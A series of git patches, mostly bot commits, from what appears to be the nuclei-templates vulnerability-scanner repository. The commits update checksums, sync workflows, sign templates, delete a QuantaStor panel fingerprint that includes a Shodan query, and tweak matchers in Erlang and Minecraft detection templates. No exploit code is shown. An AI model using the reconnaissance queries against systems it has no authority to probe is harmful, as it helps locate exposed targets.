http/default-logins/chinaunicom/chinaunicom-default-login.yaml:825cceb7abec9ba21938e316e8748da23c72c82a http/default-logins/cobbler/cobbler-default-login.yaml:2994d59f748f3b084644bb25989f6ecc8ea81a2a @@ -8559,7 +8560,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:420cd51492085071f2013177d28b721de25e3c22 +templates-checksum.txt:4849b4f936d4b7f5410130c66d61bf8ca3d30850 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 23c9e98cca80bd4462e0c1a80673c830190eb864 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 24 May 2024 06:23:14 +0000 Subject: [PATCH 1299/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index eb128ebd4d..72d43adf0a 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'http/cves/2022/CVE-2022-1580.yaml' + - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 39aeb0f16a47d9c9a1835cfd512bb1973538c648 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 06:24:30 +0000 Subject: [PATCH 1300/1768] Auto Template Signing [Fri May 24 06:24:30 UTC 2024] :robot: --- .../cambium-networks/cambium-networks-default-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/default-logins/cambium-networks/cambium-networks-default-login.yaml b/http/default-logins/cambium-networks/cambium-networks-default-login.yaml index fd5a8e520f..eeacaeb7fa 100644 --- a/http/default-logins/cambium-networks/cambium-networks-default-login.yaml +++ b/http/default-logins/cambium-networks/cambium-networks-default-login.yaml @@ -41,3 +41,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022060ca7e028b3cacd5e75c469c3b8df897700ecb1fa9e91f15b05eb6a50d9f2d31022100ab396afa79123b660bb4784387663ed5eb3f9767485f162c73fbe565f1fa8bbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 56f2522fae65b743729b8b823ba710d172196e3f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 24 May 2024 06:26:10 +0000 Subject: [PATCH 1301/1768] Auto Generated New Template Addition List [Fri May 24 06:26:10 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 35199e09a7..b9e19bdf1d 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,3 @@ http/cves/2022/CVE-2022-1580.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml +http/vulnerabilities/other/cerio-dt-rce.yaml From 881dfddd2a219abdd84da7730a5e145b38c44762 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 06:26:19 +0000 Subject: [PATCH 1302/1768] Auto Generated Templates Checksum [Fri May 24 06:26:18 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 16095914c1..0b9638e791 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3339,7 +3339,7 @@ http/default-logins/barco-clickshare-default-login.yaml:cac1f9f84f536daf4f7d3b21 http/default-logins/batflat/batflat-default-login.yaml:983b4bc3ea5162cd92de42686894cfde4482ca8d http/default-logins/bloofoxcms-default-login.yaml:521262f1b70cf41dabf50e7022c8d6874ad6f472 http/default-logins/caimore/caimore-default-login.yaml:fa6dc9fbfefd35cbe6b0122cbe2063f51286d122 -http/default-logins/cambium-networks/cambium-networks-default-login.yaml:2efac1e32f1a75cf4cae77732fb0521d5f2eff44 +http/default-logins/cambium-networks/cambium-networks-default-login.yaml:8ddd3872b928f4d2a97a7240e5f4b71ae5a2e1f5 http/default-logins/camunda/camunda-default-login.yaml:e0ba275d0aeadc4a4e0df5010277d2db9e6329e7 http/default-logins/chinaunicom/chinaunicom-default-login.yaml:825cceb7abec9ba21938e316e8748da23c72c82a http/default-logins/cobbler/cobbler-default-login.yaml:2994d59f748f3b084644bb25989f6ecc8ea81a2a @@ -7676,6 +7676,7 @@ http/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml:2c49088f1d34938eb http/vulnerabilities/other/carrental-xss.yaml:d92d2f7000cc91fd9c13049464b3ce0369c7b33e http/vulnerabilities/other/castel-digital-sqli.yaml:a2e2da7ae8d480b2bf621f6b11979cc2d8a434ff http/vulnerabilities/other/caucho-resin-info-disclosure.yaml:5cc2684a9526439bcafcefeb5f6799fde0bbb067 +http/vulnerabilities/other/cerio-dt-rce.yaml:f3184ec767f634d6e174fa303e67b3c5866236f7 http/vulnerabilities/other/chamilo-lms-sqli.yaml:27b1d49422d8918bf53b61424d7aee17a6bee23d http/vulnerabilities/other/chamilo-lms-xss.yaml:a4317a1e2cc11bf9333dcebbed04c9a16dc71199 http/vulnerabilities/other/citrix-xenapp-log4j-rce.yaml:bb592cb50df3e8b218c8c655b5a4ce12d1abf72c @@ -8560,7 +8561,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4849b4f936d4b7f5410130c66d61bf8ca3d30850 +templates-checksum.txt:ded924c130659798c79761c79766daf4ed16044f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From af0cf349d676c3082e4a418cb0af8ae0180e59e6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 24 May 2024 06:27:01 +0000 Subject: [PATCH 1303/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 72d43adf0a..446dd43db4 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'http/cves/2022/CVE-2022-1580.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' + - 'http/vulnerabilities/other/cerio-dt-rce.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 187e4835d4665604482a46cac1c74fe6f1238294 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 06:28:03 +0000 Subject: [PATCH 1304/1768] Auto Template Signing [Fri May 24 06:28:03 UTC 2024] :robot: --- http/vulnerabilities/other/cerio-dt-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/other/cerio-dt-rce.yaml b/http/vulnerabilities/other/cerio-dt-rce.yaml index b1879b1709..098c30ca5d 100644 --- a/http/vulnerabilities/other/cerio-dt-rce.yaml +++ b/http/vulnerabilities/other/cerio-dt-rce.yaml @@ -36,3 +36,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100f224cdd25f048596ecd1215e571598f1ebb9dcd7f38a628a14cf03e868e6f771022100e151ddd0d44531d2d80838a64578b6f86748aec1f806133b33cbc0d41ec6d3f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 91a9bc02f9fc22f443b27972324e9056b9928c2a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 06:49:57 +0000 Subject: [PATCH 1306/1768] Auto Generated Templates Checksum [Fri May 24 06:49:57 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0b9638e791..e2066f0b78 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6537,7 +6537,7 @@ http/takeovers/canny-takeover.yaml:cc5a760aa65559322a94344f7add91e523a63db1 http/takeovers/cargo-takeover.yaml:42db7ee4771a5cbddc6e2b8072070c583d6fd452 http/takeovers/cargocollective-takeover.yaml:dde78512f960c62936577c19801b1446ec65d5d3 http/takeovers/clever-takeover.yaml:f4d45f5b42f376d3258d2b4140a9dad14e25cd87 -http/takeovers/flexbe-takeover.yaml:e447e7c68c38eea9703f93af0b5560f9e10211ed +http/takeovers/flexbe-takeover.yaml:7f0d8cd2e79c498ac544390dd9f4e0f7db448bcc http/takeovers/frontify-takeover.yaml:e7700c7ad9bb5a761d8bd1395c6a5360c91b3dcb http/takeovers/gemfury-takeover.yaml:69d22f9c935be01d0ebad5946a9766eafe12fc68 http/takeovers/getresponse-takeover.yaml:5eff48c5b7d27eeede3d2e7fba1a8a6f314fa9bd @@ -7676,7 +7676,7 @@ http/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml:2c49088f1d34938eb http/vulnerabilities/other/carrental-xss.yaml:d92d2f7000cc91fd9c13049464b3ce0369c7b33e http/vulnerabilities/other/castel-digital-sqli.yaml:a2e2da7ae8d480b2bf621f6b11979cc2d8a434ff http/vulnerabilities/other/caucho-resin-info-disclosure.yaml:5cc2684a9526439bcafcefeb5f6799fde0bbb067 -http/vulnerabilities/other/cerio-dt-rce.yaml:f3184ec767f634d6e174fa303e67b3c5866236f7 +http/vulnerabilities/other/cerio-dt-rce.yaml:e565744efe12c9b0deb5f8898a7d9bf30a334a43 http/vulnerabilities/other/chamilo-lms-sqli.yaml:27b1d49422d8918bf53b61424d7aee17a6bee23d http/vulnerabilities/other/chamilo-lms-xss.yaml:a4317a1e2cc11bf9333dcebbed04c9a16dc71199 http/vulnerabilities/other/citrix-xenapp-log4j-rce.yaml:bb592cb50df3e8b218c8c655b5a4ce12d1abf72c @@ -8561,7 +8561,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ded924c130659798c79761c79766daf4ed16044f +templates-checksum.txt:e89606811038565c91885dfdfe6ffe0b132c0ce7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 1e85d764314545e7893d407058df34f1aa2e7124 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 06:51:39 +0000 Subject: [PATCH 1307/1768] Auto Template Signing [Fri May 24 06:51:39 UTC 2024] :robot: --- http/takeovers/flexbe-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/takeovers/flexbe-takeover.yaml b/http/takeovers/flexbe-takeover.yaml index 216b1c828f..114552775f 100644 --- a/http/takeovers/flexbe-takeover.yaml +++ b/http/takeovers/flexbe-takeover.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022100b0eb04edf08bb3be7f7019dc369fb2ce05a757eba9f8b0c43ad2ba6a99ce74a40220530f5f0dd9ad2ff3de1282b65b91678c0e2b2056086e1bcbae94064711075b51:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f23c68360f3c8ffde41189aeb0c5571b3c4ad3e7c2e9b9c0afce192211737d2b022024647b913ab69f9aad45be5b47bc86466c29cce9c87a3f3d5315394e320d4d6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 6ba053e1aee16bc9926d7ba8e048d813b60d197b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 24 May 2024 12:43:39 +0530 Subject: [PATCH 1308/1768] Delete http/exposed-panels/osnexus-quantastor-management-console.yaml --- ...osnexus-quantastor-management-console.yaml | 37 ------------------- 1 file changed, 37 deletions(-) delete mode 100644 http/exposed-panels/osnexus-quantastor-management-console.yaml diff --git a/http/exposed-panels/osnexus-quantastor-management-console.yaml b/http/exposed-panels/osnexus-quantastor-management-console.yaml deleted file mode 100644 index b1246ca697..0000000000 --- a/http/exposed-panels/osnexus-quantastor-management-console.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: osnexus-quantastor-management-console - -info: - name: OSNEXUS QuantaStor Management Console - Detect - author: Charles D - severity: info - description: OSNEXUS QuantaStor Management Console was detected - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cwe-id: CWE-200 - metadata: - max-request: 1 - shodan-query: http.title:"OS NEXUS QuantaStor Manager" - tags: management-console,login,osnexus-quantastor,osnexus - -http: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - "OS NEXUS QuantaStor Manager" - part: body - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - "'name="qsversion" content="([^"]+)"'" From 41fe0680d8cba4df76136eb2aaa6c939d926c41c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 24 May 2024 12:48:07 +0530 Subject: [PATCH 1309/1768] Update vrealize-hyperic-login-panel.yaml --- http/exposed-panels/vrealize-hyperic-login-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/vrealize-hyperic-login-panel.yaml b/http/exposed-panels/vrealize-hyperic-login-panel.yaml index d8fc286fe9..0938e0eb52 100644 --- a/http/exposed-panels/vrealize-hyperic-login-panel.yaml +++ b/http/exposed-panels/vrealize-hyperic-login-panel.yaml @@ -10,10 +10,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Sign In - Hyperic" - verified: true - tags: login,panel,vrealize,hyperic + tags: login,panel,vrealize,hyperic,detect http: - method: GET From 4c857e4fdca5a3b0b208863ca3279d0a00110e14 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 24 May 2024 15:02:24 +0530 Subject: [PATCH 1310/1768] FP-Fix erlang-daemon.yaml --- network/misconfig/erlang-daemon.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/network/misconfig/erlang-daemon.yaml b/network/misconfig/erlang-daemon.yaml index 1a29de35b9..d532249ad2 100644 --- a/network/misconfig/erlang-daemon.yaml +++ b/network/misconfig/erlang-daemon.yaml @@ -24,9 +24,16 @@ tcp: - "{{Hostname}}" port: 4369 + matchers: + - type: word + words: + - "HTTP/1.1" + negative: true + + extractors: - type: dsl name: default-instances dsl: - trim(raw, '[ ]') -# digest: 4a0a004730450220355188af0f9857f623bc4acc4a4be1bf35256e1aada20409924789891020dc19022100f4de4851b2259ca96fef0a174af79c129a8fc270ee9a965b22422c0d1d0e6d3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220355188af0f9857f623bc4acc4a4be1bf35256e1aada20409924789891020dc19022100f4de4851b2259ca96fef0a174af79c129a8fc270ee9a965b22422c0d1d0e6d3b:922c64590222798bb761d5b6d8e72950 From e67247c9fcaff3461ae000f0b41e5a0aba71774d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 24 May 2024 15:29:59 +0530 Subject: [PATCH 1311/1768] lint -fix --- network/misconfig/erlang-daemon.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/network/misconfig/erlang-daemon.yaml b/network/misconfig/erlang-daemon.yaml index d532249ad2..8e25e56b52 100644 --- a/network/misconfig/erlang-daemon.yaml +++ b/network/misconfig/erlang-daemon.yaml @@ -29,7 +29,6 @@ tcp: words: - "HTTP/1.1" negative: true - extractors: - type: dsl From bc290458b4c4f8f3ca185a21eda9d0544414d8f3 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 24 May 2024 15:32:57 +0530 Subject: [PATCH 1312/1768] Update minecraft-enum.yaml --- javascript/enumeration/minecraft-enum.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/javascript/enumeration/minecraft-enum.yaml b/javascript/enumeration/minecraft-enum.yaml index 0ef5ff5f1d..51afd01965 100644 --- a/javascript/enumeration/minecraft-enum.yaml +++ b/javascript/enumeration/minecraft-enum.yaml @@ -36,8 +36,13 @@ javascript: dsl: - "success == true" + - type: word + words: + - "HTTP/1.1" + negative: true + extractors: - type: dsl dsl: - response -# digest: 4b0a0048304602210097a010ea589db898dd8dfb9813cef0ddf6a92c583644a11ed95aa50ef8147b28022100ea4cfe825571c9cf2c1afc8dd0db45993bbd5e5b5145b18485b60ea965d66fc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210097a010ea589db898dd8dfb9813cef0ddf6a92c583644a11ed95aa50ef8147b28022100ea4cfe825571c9cf2c1afc8dd0db45993bbd5e5b5145b18485b60ea965d66fc1:922c64590222798bb761d5b6d8e72950 From 0d0e50f17da8b181ccdc23622f696bf86819789a Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 24 May 2024 15:41:23 +0530 Subject: [PATCH 1313/1768] Update minecraft-enum.yaml --- javascript/enumeration/minecraft-enum.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/enumeration/minecraft-enum.yaml b/javascript/enumeration/minecraft-enum.yaml index 51afd01965..c5baa4a68a 100644 --- a/javascript/enumeration/minecraft-enum.yaml +++ b/javascript/enumeration/minecraft-enum.yaml @@ -36,7 +36,7 @@ javascript: dsl: - "success == true" - - type: word + - type: word words: - "HTTP/1.1" negative: true From 9e302bdefc56b151be23cda47f2e24695624b935 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 10:18:03 +0000 Subject: [PATCH 1315/1768] Auto Generated Templates Checksum [Fri May 24 10:18:03 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e2066f0b78..1b3afe157a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6537,7 +6537,7 @@ http/takeovers/canny-takeover.yaml:cc5a760aa65559322a94344f7add91e523a63db1 http/takeovers/cargo-takeover.yaml:42db7ee4771a5cbddc6e2b8072070c583d6fd452 http/takeovers/cargocollective-takeover.yaml:dde78512f960c62936577c19801b1446ec65d5d3 http/takeovers/clever-takeover.yaml:f4d45f5b42f376d3258d2b4140a9dad14e25cd87 -http/takeovers/flexbe-takeover.yaml:7f0d8cd2e79c498ac544390dd9f4e0f7db448bcc +http/takeovers/flexbe-takeover.yaml:2c453090252f72ffe9b6e7671c5b8fad6db6f8f8 http/takeovers/frontify-takeover.yaml:e7700c7ad9bb5a761d8bd1395c6a5360c91b3dcb http/takeovers/gemfury-takeover.yaml:69d22f9c935be01d0ebad5946a9766eafe12fc68 http/takeovers/getresponse-takeover.yaml:5eff48c5b7d27eeede3d2e7fba1a8a6f314fa9bd @@ -8506,7 +8506,7 @@ network/misconfig/apache-dubbo-unauth.yaml:622efcfac18e7a5b1ece09a1d8a34d857d6bc network/misconfig/apache-rocketmq-broker-unauth.yaml:f6421f83ae1682e3561d7492aa5140e80e8586a7 network/misconfig/clamav-unauth.yaml:e256d077da3729eeee6c1cd4cc7ae91b23f8ebe3 network/misconfig/clickhouse-unauth.yaml:f5b90bc8e168b55bfe3543a69a59cfc508adb619 -network/misconfig/erlang-daemon.yaml:5360cef90f48dc3c6bdab6df6e44245f243f423c +network/misconfig/erlang-daemon.yaml:59020097f30b5b63b868a37ff9feda5c7f9481ea network/misconfig/ganglia-xml-grid-monitor.yaml:dac3b1babe27265e34d19b1bac7388d65f89281b network/misconfig/memcached-stats.yaml:18844aac24b0279e3bb974baccf32256d5482109 network/misconfig/mongodb-unauth.yaml:0a25bf55d5fedd1b56c397ae27e93483018ae16a @@ -8561,7 +8561,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e89606811038565c91885dfdfe6ffe0b132c0ce7 +templates-checksum.txt:03be6a57e0cefd4e293a93ff4bd3cf23df20c70a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From aa2fe8d7db78c6b8a43600b7c670fb678fa42bca Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 24 May 2024 10:19:28 +0000 Subject: [PATCH 1316/1768] Auto Generated New Template Addition List [Fri May 24 10:19:28 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b9e19bdf1d..b6bed47268 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ http/cves/2022/CVE-2022-1580.yaml +http/cves/2023/CVE-2023-48084.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From b602c91b558547dda7e58be481d8a01c5a278edc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 10:19:35 +0000 Subject: [PATCH 1317/1768] Auto Generated Templates Checksum [Fri May 24 10:19:35 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1b3afe157a..59c899e8e8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3192,6 +3192,7 @@ http/cves/2023/CVE-2023-47218.yaml:17dcf8eb7f320608649c5031de12070b46a11ebf http/cves/2023/CVE-2023-47246.yaml:87b56eba15f5c19a9a03e679fb770600520ea2d1 http/cves/2023/CVE-2023-47643.yaml:77261db868e2b2788787eb158eb22f6238707b3c http/cves/2023/CVE-2023-48023.yaml:4df3bf24775e2c4cd1e3225aaed8e9ab7ee2c73e +http/cves/2023/CVE-2023-48084.yaml:0b242dabc8934b6ed10bd722d950d3e6b19516d6 http/cves/2023/CVE-2023-48777.yaml:c747ded46f8e3a84ce76d1c7936d28733c2c8cb7 http/cves/2023/CVE-2023-49070.yaml:ea832772cb56e40e0acc8527138089777b673f16 http/cves/2023/CVE-2023-49103.yaml:8eab68a4f41466e6d9bef692647cc9e86969bd49 @@ -8561,7 +8562,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:03be6a57e0cefd4e293a93ff4bd3cf23df20c70a +templates-checksum.txt:104a05345b6f53f2e99ddf5cf8b804cfd40199e9 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 881e215f4c874bf74e053b5674c7d24a314aa578 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 10:19:46 +0000 Subject: [PATCH 1318/1768] Auto Template Signing [Fri May 24 10:19:46 UTC 2024] :robot: --- network/misconfig/erlang-daemon.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/misconfig/erlang-daemon.yaml b/network/misconfig/erlang-daemon.yaml index 8e25e56b52..3e37bd1c95 100644 --- a/network/misconfig/erlang-daemon.yaml +++ b/network/misconfig/erlang-daemon.yaml @@ -35,4 +35,4 @@ tcp: name: default-instances dsl: - trim(raw, '[ ]') -# digest: 4a0a004730450220355188af0f9857f623bc4acc4a4be1bf35256e1aada20409924789891020dc19022100f4de4851b2259ca96fef0a174af79c129a8fc270ee9a965b22422c0d1d0e6d3b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205e3d32aaa31805fb16eb5543fd1703da066ed645af6aadfa0048cbec4525f7da022100dcf07bf261985800a8875b8db6ec143915468d2c165a99ff3ee32319011ca354:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0d1d67caa4d9249ef6673a0273de027db2b3af2b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 24 May 2024 10:20:09 +0000 Subject: [PATCH 1319/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 446dd43db4..42c5934e11 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'http/cves/2022/CVE-2022-1580.yaml' + - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' workflow_dispatch: From b6f4b20db5a69e4751473ed33ac97ace98003f48 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 24 May 2024 10:23:09 +0000 Subject: [PATCH 1320/1768] Auto Generated New Template Addition List [Fri May 24 10:23:09 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b6bed47268..d3ddae9e78 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cves/2022/CVE-2022-1580.yaml http/cves/2023/CVE-2023-48084.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml +http/exposed-panels/vrealize-hyperic-login-panel.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From f2f300f23f64e808350dbde8fe51565ac1e7abe6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 10:23:15 +0000 Subject: [PATCH 1321/1768] Auto Generated Templates Checksum [Fri May 24 10:23:15 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 59c899e8e8..dac3af48e3 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4512,6 +4512,7 @@ http/exposed-panels/vmware-vcenter-converter-standalone.yaml:afd6381e2632114b860 http/exposed-panels/vmware-vcloud-director.yaml:1cc3968a991cd6cc1df9ef69bce9855ce0263481 http/exposed-panels/vodafone-voxui-panel.yaml:8c1897eb27b8ad1df6322dcfff01cfe403fc7e94 http/exposed-panels/voipmonitor-panel.yaml:e71536ce7d33bdb21196e43d271599461210c00c +http/exposed-panels/vrealize-hyperic-login-panel.yaml:93e0073e433d8250100aad758f563f4222537620 http/exposed-panels/vrealize-loginsight-panel.yaml:fd0b96b27df826ead5e909036f608a45b8fdee99 http/exposed-panels/vue-pacs-panel.yaml:a9409187ebedd24db1b6fe057b87c234ba5cf34a http/exposed-panels/wago-plc-panel.yaml:408e8ec5941005afb61d1f1b11501fefcf33b946 @@ -8507,7 +8508,7 @@ network/misconfig/apache-dubbo-unauth.yaml:622efcfac18e7a5b1ece09a1d8a34d857d6bc network/misconfig/apache-rocketmq-broker-unauth.yaml:f6421f83ae1682e3561d7492aa5140e80e8586a7 network/misconfig/clamav-unauth.yaml:e256d077da3729eeee6c1cd4cc7ae91b23f8ebe3 network/misconfig/clickhouse-unauth.yaml:f5b90bc8e168b55bfe3543a69a59cfc508adb619 -network/misconfig/erlang-daemon.yaml:59020097f30b5b63b868a37ff9feda5c7f9481ea +network/misconfig/erlang-daemon.yaml:6b5ce18b01c5ea4d816aec8292ad974940e9e880 network/misconfig/ganglia-xml-grid-monitor.yaml:dac3b1babe27265e34d19b1bac7388d65f89281b network/misconfig/memcached-stats.yaml:18844aac24b0279e3bb974baccf32256d5482109 network/misconfig/mongodb-unauth.yaml:0a25bf55d5fedd1b56c397ae27e93483018ae16a @@ -8562,7 +8563,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 